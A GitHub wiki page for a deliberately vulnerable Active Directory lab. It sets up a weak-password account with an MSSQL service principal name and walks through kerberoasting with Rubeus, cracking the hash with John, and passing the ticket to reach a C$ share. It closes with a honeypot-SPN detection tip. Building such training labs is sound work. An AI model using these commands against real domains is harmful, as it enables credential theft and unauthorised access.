Kerberoastable Account - benlee105/DeliberateVulnADConfig GitHub Wiki

1. Create a User account in Active Directory, with a weak password like P@ssw0rd
2. Launch Active Directory Users and Computers
3. Click View > Advanced Features
4. Right click user account > click Properties > click Attribute Editor tab
5. Scroll down to servicePrincipalName and set a service principal name
   MSSQLSvc/<Name.Of.Server.Plus.Domain>:1433

6. Click OK to everything.

1. Roast all kerberoastable accounts using Rubeus

rubeus.exe kerberoast /simple /nowrap

2. Copy out hash and move to Kali:

nano mssql

Right click to paste hash

Remove the Service Principal Name (e.g. MSSQLSvc/WIN-U2J3U9JDNJV.bentest.local:1433) from the content

Before

After

Ctrl + X > Y > Enter

john --format=krb5tgs --wordlist=<your Wordlist> mssql

3. Copy password from john output, and utilize Rubeus to ask for a TGT, then pass the ticket.

rubeus.exe asktgt /user:<username> /password:<password> /ptt

4. Verify access.

dir \\target\C$

By default, Rubeus will roast every account that has an SPN. Honey Pot accounts can be configured with a "fake" SPN, which will generate a 4769 event when roasted. Since these events will never be generated for this service, it provides a high-fidelity indication of this attack.